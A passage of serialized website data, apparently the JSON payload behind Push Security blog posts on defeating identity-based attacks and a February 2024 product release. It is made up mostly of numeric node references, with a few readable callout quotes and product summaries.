,[261235],{"nodeType":178,"data":261236,"content":261237},{},[261238],{"nodeType":173,"value":246083,"marks":261239,"data":261240},[],{},{"nodeType":254,"data":261242,"content":261243},{},[261244],{"nodeType":178,"data":261245,"content":261246},{},[261247],{"nodeType":173,"value":246093,"marks":261248,"data":261249},[],{},{"nodeType":254,"data":261251,"content":261252},{},[261253],{"nodeType":178,"data":261254,"content":261255},{},[261256],{"nodeType":173,"value":246103,"marks":261257,"data":261258},[],{},{"nodeType":254,"data":261260,"content":261261},{},[261262],{"nodeType":178,"data":261263,"content":261264},{},[261265],{"nodeType":173,"value":246113,"marks":261266,"data":261267},[],{},{"nodeType":312,"data":261269,"content":261272},{"target":261270},{"sys":261271},{"id":246120,"type":317,"linkType":318},[],{"nodeType":169,"data":261274,"content":261275},{},[261276],{"nodeType":173,"value":246126,"marks":261277,"data":261278},[],{},{"nodeType":178,"data":261280,"content":261281},{},[261282],{"nodeType":173,"value":246133,"marks":261283,"data":261284},[],{},{"nodeType":178,"data":261286,"content":261287},{},[261288],{"nodeType":173,"value":246140,"marks":261289,"data":261290},[],{},{"nodeType":178,"data":261292,"content":261293},{},[261294],{"nodeType":173,"value":246147,"marks":261295,"data":261296},[],{},{"nodeType":178,"data":261298,"content":261299},{},[261300,261303,261307,261310,261314],{"nodeType":173,"value":246154,"marks":261301,"data":261302},[],{},{"nodeType":173,"value":246158,"marks":261304,"data":261306},[261305],{"type":1646},{},{"nodeType":173,"value":246163,"marks":261308,"data":261309},[],{},{"nodeType":173,"value":246167,"marks":261311,"data":261313},[261312],{"type":1646},{},{"nodeType":173,"value":246172,"marks":261315,"data":261316},[],{},{"nodeType":178,"data":261318,"content":261319},{},[261320],{"nodeType":173,"value":246179,"marks":261321,"data":261322},[],{},{"nodeType":169,"data":261324,"content":261325},{},[261326],{"nodeType":173,"value":235856,"marks":261327,"data":261328},[],{},{"nodeType":246189,"data":261330,"content":261331},{},[261332,261341,261350,261366,261382],{"nodeType":254,"data":261333,"content":261334},{},[261335],{"nodeType":178,"data":261336,"content":261337},{},[261338],{"nodeType":173,"value":246199,"marks":261339,"data":261340},[],{},{"nodeType":254,"data":261342,"content":261343},{},[261344],{"nodeType":178,"data":261345,"content":261346},{},[261347],{"nodeType":173,"value":246209,"marks":261348,"data":261349},[],{},{"nodeType":254,"data":261351,"content":261352},{},[261353],{"nodeType":178,"data":261354,"content":261355},{},[261356,261359,261363],{"nodeType":173,"value":246219,"marks":261357,"data":261358},[],{},{"nodeType":173,"value":246223,"marks":261360,"data":261362},[261361],{"type":370},{},{"nodeType":173,"value":246228,"marks":261364,"data":261365},[],{},{"nodeType":254,"data":261367,"content":261368},{},[261369],{"nodeType":178,"data":261370,"content":261371},{},[261372,261375,261379],{"nodeType":173,"value":157297,"marks":261373,"data":261374},[],{},{"nodeType":173,"value":246241,"marks":261376,"data":261378},[261377],{"type":370},{},{"nodeType":173,"value":246246,"marks":261380,"data":261381},[],{},{"nodeType":254,"data":261383,"content":261384},{},[261385],{"nodeType":178,"data":261386,"content":261387},{},[261388],{"nodeType":173,"value":246256,"marks":261389,"data":261390},[],{},{"nodeType":169,"data":261392,"content":261393},{},[261394],{"nodeType":173,"value":246263,"marks":261395,"data":261396},[],{},{"nodeType":235,"data":261398,"content":261399},{},[261400],{"nodeType":173,"value":246270,"marks":261401,"data":261402},[],{},{"nodeType":178,"data":261404,"content":261405},{},[261406],{"nodeType":173,"value":246277,"marks":261407,"data":261408},[],{},{"nodeType":312,"data":261410,"content":261413},{"target":261411},{"sys":261412},{"id":246284,"type":317,"linkType":318},[],{"nodeType":235,"data":261415,"content":261416},{},[261417],{"nodeType":173,"value":246290,"marks":261418,"data":261419},[],{},{"nodeType":178,"data":261421,"content":261422},{},[261423],{"nodeType":173,"value":246297,"marks":261424,"data":261425},[],{},{"nodeType":312,"data":261427,"content":261430},{"target":261428},{"sys":261429},{"id":246304,"type":317,"linkType":318},[],{"nodeType":235,"data":261432,"content":261433},{},[261434],{"nodeType":173,"value":246310,"marks":261435,"data":261436},[],{},{"nodeType":178,"data":261438,"content":261439},{},[261440],{"nodeType":173,"value":246317,"marks":261441,"data":261442},[],{},{"nodeType":312,"data":261444,"content":261447},{"target":261445},{"sys":261446},{"id":246324,"type":317,"linkType":318},[],{"nodeType":169,"data":261449,"content":261450},{},[261451],{"nodeType":173,"value":71801,"marks":261452,"data":261453},[],{},{"nodeType":178,"data":261455,"content":261456},{},[261457,261460,261466],{"nodeType":173,"value":114452,"marks":261458,"data":261459},[],{},{"nodeType":186,"data":261461,"content":261462},{"uri":473},[261463],{"nodeType":173,"value":88194,"marks":261464,"data":261465},[],{},{"nodeType":173,"value":246345,"marks":261467,"data":261468},[],{},{"items":261470},[261471,261473],{"sys":261472,"name":26137},{"id":26136},{"sys":261474,"name":18399},{"id":18398},{"items":261476},[261477],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":261478},{"url":516},{"items":261480},[261481],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":261482},{"url":13981},{"json":261484,"links":262078},{"nodeType":165,"data":261485,"content":261486},{},[261487,261493,261499,261505,261511,261517,261523,261529,261535,261541,261547,261553,261566,261572,261578,261584,261590,261596,261602,261608,261613,261619,261625,261631,261637,261642,261649,261655,261661,261667,261673,261680,261686,261691,261697,261703,261724,261730,261760,261766,261779,261786,261792,261798,261804,261810,261858,261864,261869,261875,261881,261887,261894,261900,261906,261912,261937,261943,261973,261979,261985,261991,261997,262004,262010,262016,262022,262028,262034,262040,262046,262052,262067,262072],{"nodeType":169,"data":261488,"content":261489},{},[261490],{"nodeType":173,"value":161748,"marks":261491,"data":261492},[],{},{"nodeType":178,"data":261494,"content":261495},{},[261496],{"nodeType":173,"value":161755,"marks":261497,"data":261498},[],{},{"nodeType":178,"data":261500,"content":261501},{},[261502],{"nodeType":173,"value":161762,"marks":261503,"data":261504},[],{},{"nodeType":178,"data":261506,"content":261507},{},[261508],{"nodeType":173,"value":161769,"marks":261509,"data":261510},[],{},{"nodeType":178,"data":261512,"content":261513},{},[261514],{"nodeType":173,"value":161776,"marks":261515,"data":261516},[],{},{"nodeType":169,"data":261518,"content":261519},{},[261520],{"nodeType":173,"value":161783,"marks":261521,"data":261522},[],{},{"nodeType":178,"data":261524,"content":261525},{},[261526],{"nodeType":173,"value":37,"marks":261527,"data":261528},[],{},{"nodeType":178,"data":261530,"content":261531},{},[261532],{"nodeType":173,"value":161796,"marks":261533,"data":261534},[],{},{"nodeType":235,"data":261536,"content":261537},{},[261538],{"nodeType":173,"value":161803,"marks":261539,"data":261540},[],{},{"nodeType":178,"data":261542,"content":261543},{},[261544],{"nodeType":173,"value":161810,"marks":261545,"data":261546},[],{},{"nodeType":178,"data":261548,"content":261549},{},[261550],{"nodeType":173,"value":161817,"marks":261551,"data":261552},[],{},{"nodeType":178,"data":261554,"content":261555},{},[261556,261559,261563],{"nodeType":173,"value":161824,"marks":261557,"data":261558},[],{},{"nodeType":173,"value":161828,"marks":261560,"data":261562},[261561],{"type":1646},{},{"nodeType":173,"value":161833,"marks":261564,"data":261565},[],{},{"nodeType":178,"data":261567,"content":261568},{},[261569],{"nodeType":173,"value":161840,"marks":261570,"data":261571},[],{},{"nodeType":235,"data":261573,"content":261574},{},[261575],{"nodeType":173,"value":161847,"marks":261576,"data":261577},[],{},{"nodeType":178,"data":261579,"content":261580},{},[261581],{"nodeType":173,"value":161854,"marks":261582,"data":261583},[],{},{"nodeType":178,"data":261585,"content":261586},{},[261587],{"nodeType":173,"value":161861,"marks":261588,"data":261589},[],{},{"nodeType":178,"data":261591,"content":261592},{},[261593],{"nodeType":173,"value":161868,"marks":261594,"data":261595},[],{},{"nodeType":235,"data":261597,"content":261598},{},[261599],{"nodeType":173,"value":161875,"marks":261600,"data":261601},[],{},{"nodeType":178,"data":261603,"content":261604},{},[261605],{"nodeType":173,"value":161882,"marks":261606,"data":261607},[],{},{"nodeType":312,"data":261609,"content":261612},{"target":261610},{"sys":261611},{"id":161889,"type":317,"linkType":318},[],{"nodeType":178,"data":261614,"content":261615},{},[261616],{"nodeType":173,"value":161895,"marks":261617,"data":261618},[],{},{"nodeType":178,"data":261620,"content":261621},{},[261622],{"nodeType":173,"value":161902,"marks":261623,"data":261624},[],{},{"nodeType":169,"data":261626,"content":261627},{},[261628],{"nodeType":173,"value":161909,"marks":261629,"data":261630},[],{},{"nodeType":178,"data":261632,"content":261633},{},[261634],{"nodeType":173,"value":161916,"marks":261635,"data":261636},[],{},{"nodeType":312,"data":261638,"content":261641},{"target":261639},{"sys":261640},{"id":161923,"type":317,"linkType":318},[],{"nodeType":235,"data":261643,"content":261644},{},[261645],{"nodeType":173,"value":161929,"marks":261646,"data":261648},[261647],{"type":370},{},{"nodeType":178,"data":261650,"content":261651},{},[261652],{"nodeType":173,"value":161937,"marks":261653,"data":261654},[],{},{"nodeType":178,"data":261656,"content":261657},{},[261658],{"nodeType":173,"value":161944,"marks":261659,"data":261660},[],{},{"nodeType":178,"data":261662,"content":261663},{},[261664],{"nodeType":173,"value":161951,"marks":261665,"data":261666},[],{},{"nodeType":178,"data":261668,"content":261669},{},[261670],{"nodeType":173,"value":161958,"marks":261671,"data":261672},[],{},{"nodeType":235,"data":261674,"content":261675},{},[261676],{"nodeType":173,"value":161965,"marks":261677,"data":261679},[261678],{"type":370},{},{"nodeType":178,"data":261681,"content":261682},{},[261683],{"nodeType":173,"value":161973,"marks":261684,"data":261685},[],{},{"nodeType":312,"data":261687,"content":261690},{"target":261688},{"sys":261689},{"id":161980,"type":317,"linkType":318},[],{"nodeType":178,"data":261692,"content":261693},{},[261694],{"nodeType":173,"value":161986,"marks":261695,"data":261696},[],{},{"nodeType":178,"data":261698,"content":261699},{},[261700],{"nodeType":173,"value":161993,"marks":261701,"data":261702},[],{},{"nodeType":250,"data":261704,"content":261705},{},[261706,261715],{"nodeType":254,"data":261707,"content":261708},{},[261709],{"nodeType":178,"data":261710,"content":261711},{},[261712],{"nodeType":173,"value":162006,"marks":261713,"data":261714},[],{},{"nodeType":254,"data":261716,"content":261717},{},[261718],{"nodeType":178,"data":261719,"content":261720},{},[261721],{"nodeType":173,"value":162016,"marks":261722,"data":261723},[],{},{"nodeType":178,"data":261725,"content":261726},{},[261727],{"nodeType":173,"value":162023,"marks":261728,"data":261729},[],{},{"nodeType":250,"data":261731,"content":261732},{},[261733,261742,261751],{"nodeType":254,"data":261734,"content":261735},{},[261736],{"nodeType":178,"data":261737,"content":261738},{},[261739],{"nodeType":173,"value":162036,"marks":261740,"data":261741},[],{},{"nodeType":254,"data":261743,"content":261744},{},[261745],{"nodeType":178,"data":261746,"content":261747},{},[261748],{"nodeType":173,"value":162046,"marks":261749,"data":261750},[],{},{"nodeType":254,"data":261752,"content":261753},{},[261754],{"nodeType":178,"data":261755,"content":261756},{},[261757],{"nodeType":173,"value":162056,"marks":261758,"data":261759},[],{},{"nodeType":178,"data":261761,"content":261762},{},[261763],{"nodeType":173,"value":162063,"marks":261764,"data":261765},[],{},{"nodeType":178,"data":261767,"content":261768},{},[261769,261772,261776],{"nodeType":173,"value":162070,"marks":261770,"data":261771},[],{},{"nodeType":173,"value":162074,"marks":261773,"data":261775},[261774],{"type":370},{},{"nodeType":173,"value":162079,"marks":261777,"data":261778},[],{},{"nodeType":235,"data":261780,"content":261781},{},[261782],{"nodeType":173,"value":162086,"marks":261783,"data":261785},[261784],{"type":370},{},{"nodeType":178,"data":261787,"content":261788},{},[261789],{"nodeType":173,"value":162094,"marks":261790,"data":261791},[],{},{"nodeType":178,"data":261793,"content":261794},{},[261795],{"nodeType":173,"value":162101,"marks":261796,"data":261797},[],{},{"nodeType":178,"data":261799,"content":261800},{},[261801],{"nodeType":173,"value":162108,"marks":261802,"data":261803},[],{},{"nodeType":178,"data":261805,"content":261806},{},[261807],{"nodeType":173,"value":162115,"marks":261808,"data":261809},[],{},{"nodeType":250,"data":261811,"content":261812},{},[261813,261822,261831,261840,261849],{"nodeType":254,"data":261814,"content":261815},{},[261816],{"nodeType":178,"data":261817,"content":261818},{},[261819],{"nodeType":173,"value":162128,"marks":261820,"data":261821},[],{},{"nodeType":254,"data":261823,"content":261824},{},[261825],{"nodeType":178,"data":261826,"content":261827},{},[261828],{"nodeType":173,"value":162138,"marks":261829,"data":261830},[],{},{"nodeType":254,"data":261832,"content":261833},{},[261834],{"nodeType":178,"data":261835,"content":261836},{},[261837],{"nodeType":173,"value":162148,"marks":261838,"data":261839},[],{},{"nodeType":254,"data":261841,"content":261842},{},[261843],{"nodeType":178,"data":261844,"content":261845},{},[261846],{"nodeType":173,"value":162158,"marks":261847,"data":261848},[],{},{"nodeType":254,"data":261850,"content":261851},{},[261852],{"nodeType":178,"data":261853,"content":261854},{},[261855],{"nodeType":173,"value":162168,"marks":261856,"data":261857},[],{},{"nodeType":178,"data":261859,"content":261860},{},[261861],{"nodeType":173,"value":162175,"marks":261862,"data":261863},[],{},{"nodeType":312,"data":261865,"content":261868},{"target":261866},{"sys":261867},{"id":162182,"type":317,"linkType":318},[],{"nodeType":178,"data":261870,"content":261871},{},[261872],{"nodeType":173,"value":162188,"marks":261873,"data":261874},[],{},{"nodeType":178,"data":261876,"content":261877},{},[261878],{"nodeType":173,"value":162195,"marks":261879,"data":261880},[],{},{"nodeType":178,"data":261882,"content":261883},{},[261884],{"nodeType":173,"value":162202,"marks":261885,"data":261886},[],{},{"nodeType":235,"data":261888,"content":261889},{},[261890],{"nodeType":173,"value":162209,"marks":261891,"data":261893},[261892],{"type":370},{},{"nodeType":178,"data":261895,"content":261896},{},[261897],{"nodeType":173,"value":162217,"marks":261898,"data":261899},[],{},{"nodeType":178,"data":261901,"content":261902},{},[261903],{"nodeType":173,"value":162224,"marks":261904,"data":261905},[],{},{"nodeType":178,"data":261907,"content":261908},{},[261909],{"nodeType":173,"value":162231,"marks":261910,"data":261911},[],{},{"nodeType":178,"data":261913,"content":261914},{},[261915,261918,261925,261928,261934],{"nodeType":173,"value":162238,"marks":261916,"data":261917},[],{},{"nodeType":186,"data":261919,"content":261920},{"uri":162243},[261921],{"nodeType":173,"value":162246,"marks":261922,"data":261924},[261923],{"type":194},{},{"nodeType":173,"value":162251,"marks":261926,"data":261927},[],{},{"nodeType":186,"data":261929,"content":261930},{"uri":63250},[261931],{"nodeType":173,"value":63256,"marks":261932,"data":261933},[],{},{"nodeType":173,"value":162261,"marks":261935,"data":261936},[],{},{"nodeType":178,"data":261938,"content":261939},{},[261940],{"nodeType":173,"value":162268,"marks":261941,"data":261942},[],{},{"nodeType":250,"data":261944,"content":261945},{},[261946,261955],{"nodeType":254,"data":261947,"content":261948},{},[261949],{"nodeType":178,"data":261950,"content":261951},{},[261952],{"nodeType":173,"value":162281,"marks":261953,"data":261954},[],{},{"nodeType":254,"data":261956,"content":261957},{},[261958],{"nodeType":178,"data":261959,"content":261960},{},[261961,261964,261970],{"nodeType":173,"value":162291,"marks":261962,"data":261963},[],{},{"nodeType":186,"data":261965,"content":261966},{"uri":162296},[261967],{"nodeType":173,"value":162299,"marks":261968,"data":261969},[],{},{"nodeType":173,"value":1477,"marks":261971,"data":261972},[],{},{"nodeType":178,"data":261974,"content":261975},{},[261976],{"nodeType":173,"value":162309,"marks":261977,"data":261978},[],{},{"nodeType":178,"data":261980,"content":261981},{},[261982],{"nodeType":173,"value":162316,"marks":261983,"data":261984},[],{},{"nodeType":178,"data":261986,"content":261987},{},[261988],{"nodeType":173,"value":162323,"marks":261989,"data":261990},[],{},{"nodeType":178,"data":261992,"content":261993},{},[261994],{"nodeType":173,"value":162330,"marks":261995,"data":261996},[],{},{"nodeType":235,"data":261998,"content":261999},{},[262000],{"nodeType":173,"value":162337,"marks":262001,"data":262003},[262002],{"type":370},{},{"nodeType":178,"data":262005,"content":262006},{},[262007],{"nodeType":173,"value":162345,"marks":262008,"data":262009},[],{},{"nodeType":178,"data":262011,"content":262012},{},[262013],{"nodeType":173,"value":162352,"marks":262014,"data":262015},[],{},{"nodeType":178,"data":262017,"content":262018},{},[262019],{"nodeType":173,"value":162359,"marks":262020,"data":262021},[],{},{"nodeType":178,"data":262023,"content":262024},{},[262025],{"nodeType":173,"value":162366,"marks":262026,"data":262027},[],{},{"nodeType":178,"data":262029,"content":262030},{},[262031],{"nodeType":173,"value":162373,"marks":262032,"data":262033},[],{},{"nodeType":169,"data":262035,"content":262036},{},[262037],{"nodeType":173,"value":162380,"marks":262038,"data":262039},[],{},{"nodeType":178,"data":262041,"content":262042},{},[262043],{"nodeType":173,"value":162387,"marks":262044,"data":262045},[],{},{"nodeType":178,"data":262047,"content":262048},{},[262049],{"nodeType":173,"value":162394,"marks":262050,"data":262051},[],{},{"nodeType":178,"data":262053,"content":262054},{},[262055,262058,262064],{"nodeType":173,"value":162401,"marks":262056,"data":262057},[],{},{"nodeType":186,"data":262059,"content":262060},{"uri":117869},[262061],{"nodeType":173,"value":162408,"marks":262062,"data":262063},[],{},{"nodeType":173,"value":162412,"marks":262065,"data":262066},[],{},{"nodeType":312,"data":262068,"content":262071},{"target":262069},{"sys":262070},{"id":162419,"type":317,"linkType":318},[],{"nodeType":178,"data":262073,"content":262074},{},[262075],{"nodeType":173,"value":37,"marks":262076,"data":262077},[],{},{"entries":262079},{"hyperlink":262080,"inline":262081,"block":262082},[],[],[262083,262086,262090,262096,262100],{"sys":262084,"__typename":5345,"title":254285,"caption":118,"layoutMode":118,"file":262085},{"id":161889},{"url":254287,"width":254288,"height":23880},{"sys":262087,"__typename":5345,"title":161909,"caption":118,"layoutMode":118,"file":262088},{"id":161923},{"url":262089,"width":5399,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/3vdIRlCwvBIk9RVpjRXojS/8092a8c05abb75206373e55340bbd07e/IdentitySecurity101_B.png",{"sys":262091,"__typename":262092,"background":262093,"text":262095},{"id":161980},"CalloutWidget",[262094],"Sea Blue","“If you halve the number of network services an attacker can target, that means you can spend twice as long per service to secure the ones that remain - the same goes for identities!”",{"sys":262097,"__typename":262092,"background":262098,"text":262099},{"id":162182},[262094],"It’s not yet standard practice to test or verify that identity controls are in place, but if the past has taught us anything it soon will be.",{"sys":262101,"__typename":15269,"type":112637,"ctaText":262102,"buttonLabel":93499,"buttonColour":15273,"buttonUrl":118},{"id":162419},"Push maps your identity attack surface, hardens and minimizes it, helps you reduce impact and provides a unique telemetry source to help you detect and respond to identity attacks.","content:blog:5-ways-to-defeat-identity-based-attacks.json","blog/5-ways-to-defeat-identity-based-attacks.json","blog/5-ways-to-defeat-identity-based-attacks",{"_path":262107,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":262108,"ogImage":118,"summary":262110,"title":245566,"subtitle":118,"metaTitle":262121,"synopsis":245567,"hashTags":118,"publishedDate":245568,"slug":245569,"tagsCollection":262122,"relatedBlogPostsCollection":262126,"authorsCollection":262568,"content":262572,"_id":262819,"_type":5439,"_source":5440,"_file":262820,"_stem":262821,"_extension":5439},"/blog/product-release-february-2024",{"id":245323,"publishedAt":262109},"2024-02-21T15:30:16.570Z",{"json":262111},{"data":262112,"content":262113,"nodeType":165},{},[262114],{"data":262115,"content":262116,"nodeType":178},{},[262117],{"data":262118,"marks":262119,"value":262120,"nodeType":173},{},[],"Add guardrails to apps with app banners, monitor all domains for work apps, build detections with Login event webhook, and detect password usage for SSO apps","Push Security new product features for February 2024",{"items":262123},[262124],{"sys":262125,"name":18399},{"id":18398},{"items":262127},[262128,262366],{"__typename":1528,"sys":262129,"content":262130,"title":252949,"synopsis":252950,"hashTags":118,"publishedDate":252951,"slug":252952,"tagsCollection":262358,"authorsCollection":262362},{"id":252692},{"json":262131},{"nodeType":165,"data":262132,"content":262133},{},[262134,262140,262179,262184,262190,262196,262209,262214,262230,262236,262249,262254,262271,262277,262294,262299,262316,262321,262327,262347,262352],{"nodeType":235,"data":262135,"content":262136},{},[262137],{"nodeType":173,"value":220348,"marks":262138,"data":262139},[],{},{"nodeType":250,"data":262141,"content":262142},{},[262143,262152,262161,262170],{"nodeType":254,"data":262144,"content":262145},{},[262146],{"nodeType":178,"data":262147,"content":262148},{},[262149],{"nodeType":173,"value":252713,"marks":262150,"data":262151},[],{},{"nodeType":254,"data":262153,"content":262154},{},[262155],{"nodeType":178,"data":262156,"content":262157},{},[262158],{"nodeType":173,"value":252723,"marks":262159,"data":262160},[],{},{"nodeType":254,"data":262162,"content":262163},{},[262164],{"nodeType":178,"data":262165,"content":262166},{},[262167],{"nodeType":173,"value":252733,"marks":262168,"data":262169},[],{},{"nodeType":254,"data":262171,"content":262172},{},[262173],{"nodeType":178,"data":262174,"content":262175},{},[262176],{"nodeType":173,"value":252743,"marks":262177,"data":262178},[],{},{"nodeType":312,"data":262180,"content":262183},{"target":262181},{"sys":262182},{"id":209109,"type":317,"linkType":318},[],{"nodeType":235,"data":262185,"content":262186},{},[262187],{"nodeType":173,"value":252755,"marks":262188,"data":262189},[],{},{"nodeType":178,"data":262191,"content":262192},{},[262193],{"nodeType":173,"value":252762,"marks":262194,"data":262195},[],{},{"nodeType":178,"data":262197,"content":262198},{},[262199,262202,262206],{"nodeType":173,"value":252769,"marks":262200,"data":262201},[],{},{"nodeType":173,"value":2789,"marks":262203,"data":262205},[262204],{"type":370},{},{"nodeType":173,"value":245443,"marks":262207,"data":262208},[],{},{"nodeType":312,"data":262210,"content":262213},{"target":262211},{"sys":262212},{"id":252783,"type":317,"linkType":318},[],{"nodeType":178,"data":262215,"content":262216},{},[262217,262220,262227],{"nodeType":173,"value":37,"marks":262218,"data":262219},[],{},{"nodeType":186,"data":262221,"content":262222},{"uri":183466},[262223],{"nodeType":173,"value":252795,"marks":262224,"data":262226},[262225],{"type":194},{},{"nodeType":173,"value":37,"marks":262228,"data":262229},[],{},{"nodeType":235,"data":262231,"content":262232},{},[262233],{"nodeType":173,"value":252806,"marks":262234,"data":262235},[],{},{"nodeType":178,"data":262237,"content":262238},{},[262239,262242,262246],{"nodeType":173,"value":252813,"marks":262240,"data":262241},[],{},{"nodeType":173,"value":71552,"marks":262243,"data":262245},[262244],{"type":370},{},{"nodeType":173,"value":252821,"marks":262247,"data":262248},[],{},{"nodeType":312,"data":262250,"content":262253},{"target":262251},{"sys":262252},{"id":252828,"type":317,"linkType":318},[],{"nodeType":178,"data":262255,"content":262256},{},[262257,262260,262268],{"nodeType":173,"value":37,"marks":262258,"data":262259},[],{},{"nodeType":1698,"data":262261,"content":262264},{"target":262262},{"sys":262263},{"id":148863,"type":317,"linkType":318},[262265],{"nodeType":173,"value":148770,"marks":262266,"data":262267},[],{},{"nodeType":173,"value":37,"marks":262269,"data":262270},[],{},{"nodeType":235,"data":262272,"content":262273},{},[262274],{"nodeType":173,"value":252733,"marks":262275,"data":262276},[],{},{"nodeType":178,"data":262278,"content":262279},{},[262280,262283,262291],{"nodeType":173,"value":252857,"marks":262281,"data":262282},[],{},{"nodeType":1698,"data":262284,"content":262287},{"target":262285},{"sys":262286},{"id":252864,"type":317,"linkType":318},[262288],{"nodeType":173,"value":252867,"marks":262289,"data":262290},[],{},{"nodeType":173,"value":252871,"marks":262292,"data":262293},[],{},{"nodeType":312,"data":262295,"content":262298},{"target":262296},{"sys":262297},{"id":252878,"type":317,"linkType":318},[],{"nodeType":178,"data":262300,"content":262301},{},[262302,262305,262313],{"nodeType":173,"value":148826,"marks":262303,"data":262304},[],{},{"nodeType":1698,"data":262306,"content":262309},{"target":262307},{"sys":262308},{"id":252890,"type":317,"linkType":318},[262310],{"nodeType":173,"value":252893,"marks":262311,"data":262312},[],{},{"nodeType":173,"value":252897,"marks":262314,"data":262315},[],{},{"nodeType":312,"data":262317,"content":262320},{"target":262318},{"sys":262319},{"id":252904,"type":317,"linkType":318},[],{"nodeType":235,"data":262322,"content":262323},{},[262324],{"nodeType":173,"value":252910,"marks":262325,"data":262326},[],{},{"nodeType":178,"data":262328,"content":262329},{},[262330,262333,262337,262340,262344],{"nodeType":173,"value":252917,"marks":262331,"data":262332},[],{},{"nodeType":173,"value":252921,"marks":262334,"data":262336},[262335],{"type":370},{},{"nodeType":173,"value":252926,"marks":262338,"data":262339},[],{},{"nodeType":173,"value":71581,"marks":262341,"data":262343},[262342],{"type":370},{},{"nodeType":173,"value":252934,"marks":262345,"data":262346},[],{},{"nodeType":312,"data":262348,"content":262351},{"target":262349},{"sys":262350},{"id":252941,"type":317,"linkType":318},[],{"nodeType":178,"data":262353,"content":262354},{},[262355],{"nodeType":173,"value":37,"marks":262356,"data":262357},[],{},{"items":262359},[262360],{"sys":262361,"name":18399},{"id":18398},{"items":262363},[262364],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":262365},{"url":19129},{"__typename":1528,"sys":262367,"content":262368,"title":253854,"synopsis":253855,"hashTags":118,"publishedDate":253856,"slug":253857,"tagsCollection":262560,"authorsCollection":262564},{"id":253640},{"json":262369},{"nodeType":165,"data":262370,"content":262371},{},[262372,262378,262408,262414,262427,262432,262449,262455,262468,262473,262490,262496,262509,262538,262544,262549,262554],{"nodeType":235,"data":262373,"content":262374},{},[262375],{"nodeType":173,"value":220348,"marks":262376,"data":262377},[],{},{"nodeType":250,"data":262379,"content":262380},{},[262381,262390,262399],{"nodeType":254,"data":262382,"content":262383},{},[262384],{"nodeType":178,"data":262385,"content":262386},{},[262387],{"nodeType":173,"value":253661,"marks":262388,"data":262389},[],{},{"nodeType":254,"data":262391,"content":262392},{},[262393],{"nodeType":178,"data":262394,"content":262395},{},[262396],{"nodeType":173,"value":253671,"marks":262397,"data":262398},[],{},{"nodeType":254,"data":262400,"content":262401},{},[262402],{"nodeType":178,"data":262403,"content":262404},{},[262405],{"nodeType":173,"value":253681,"marks":262406,"data":262407},[],{},{"nodeType":235,"data":262409,"content":262410},{},[262411],{"nodeType":173,"value":253688,"marks":262412,"data":262413},[],{},{"nodeType":178,"data":262415,"content":262416},{},[262417,262420,262424],{"nodeType":173,"value":253695,"marks":262418,"data":262419},[],{},{"nodeType":173,"value":253699,"marks":262421,"data":262423},[262422],{"type":370},{},{"nodeType":173,"value":253704,"marks":262425,"data":262426},[],{},{"nodeType":312,"data":262428,"content":262431},{"target":262429},{"sys":262430},{"id":253711,"type":317,"linkType":318},[],{"nodeType":178,"data":262433,"content":262434},{},[262435,262438,262446],{"nodeType":173,"value":37,"marks":262436,"data":262437},[],{},{"nodeType":1698,"data":262439,"content":262442},{"target":262440},{"sys":262441},{"id":248611,"type":317,"linkType":318},[262443],{"nodeType":173,"value":18605,"marks":262444,"data":262445},[],{},{"nodeType":173,"value":37,"marks":262447,"data":262448},[],{},{"nodeType":235,"data":262450,"content":262451},{},[262452],{"nodeType":173,"value":253734,"marks":262453,"data":262454},[],{},{"nodeType":178,"data":262456,"content":262457},{},[262458,262461,262465],{"nodeType":173,"value":253741,"marks":262459,"data":262460},[],{},{"nodeType":173,"value":253745,"marks":262462,"data":262464},[262463],{"type":370},{},{"nodeType":173,"value":253750,"marks":262466,"data":262467},[],{},{"nodeType":312,"data":262469,"content":262472},{"target":262470},{"sys":262471},{"id":253757,"type":317,"linkType":318},[],{"nodeType":178,"data":262474,"content":262475},{},[262476,262479,262487],{"nodeType":173,"value":37,"marks":262477,"data":262478},[],{},{"nodeType":1698,"data":262480,"content":262483},{"target":262481},{"sys":262482},{"id":253769,"type":317,"linkType":318},[262484],{"nodeType":173,"value":148770,"marks":262485,"data":262486},[],{},{"nodeType":173,"value":37,"marks":262488,"data":262489},[],{},{"nodeType":235,"data":262491,"content":262492},{},[262493],{"nodeType":173,"value":253681,"marks":262494,"data":262495},[],{},{"nodeType":178,"data":262497,"content":262498},{},[262499,262502,262506],{"nodeType":173,"value":156608,"marks":262500,"data":262501},[],{},{"nodeType":173,"value":71581,"marks":262503,"data":262505},[262504],{"type":370},{},{"nodeType":173,"value":253794,"marks":262507,"data":262508},[],{},{"nodeType":250,"data":262510,"content":262511},{},[262512,262525],{"nodeType":254,"data":262513,"content":262514},{},[262515],{"nodeType":178,"data":262516,"content":262517},{},[262518,262522],{"nodeType":173,"value":253807,"marks":262519,"data":262521},[262520],{"type":370},{},{"nodeType":173,"value":253812,"marks":262523,"data":262524},[],{},{"nodeType":254,"data":262526,"content":262527},{},[262528],{"nodeType":178,"data":262529,"content":262530},{},[262531,262535],{"nodeType":173,"value":253822,"marks":262532,"data":262534},[262533],{"type":370},{},{"nodeType":173,"value":253827,"marks":262536,"data":262537},[],{},{"nodeType":178,"data":262539,"content":262540},{},[262541],{"nodeType":173,"value":253834,"marks":262542,"data":262543},[],{},{"nodeType":312,"data":262545,"content":262548},{"target":262546},{"sys":262547},{"id":253841,"type":317,"linkType":318},[],{"nodeType":312,"data":262550,"content":262553},{"target":262551},{"sys":262552},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":262555,"content":262556},{},[262557],{"nodeType":173,"value":37,"marks":262558,"data":262559},[],{},{"items":262561},[262562],{"sys":262563,"name":18399},{"id":18398},{"items":262565},[262566],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":262567},{"url":19129},{"items":262569},[262570],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":262571},{"url":19129},{"json":262573,"links":262790},{"data":262574,"content":262575,"nodeType":165},{},[262576,262582,262621,262627,262633,262638,262655,262661,262681,262686,262703,262709,262715,262721,262736,262742,262755,262768,262773],{"data":262577,"content":262578,"nodeType":235},{},[262579],{"data":262580,"marks":262581,"value":220348,"nodeType":173},{},[],{"data":262583,"content":262584,"nodeType":250},{},[262585,262594,262603,262612],{"data":262586,"content":262587,"nodeType":254},{},[262588],{"data":262589,"content":262590,"nodeType":178},{},[262591],{"data":262592,"marks":262593,"value":245346,"nodeType":173},{},[],{"data":262595,"content":262596,"nodeType":25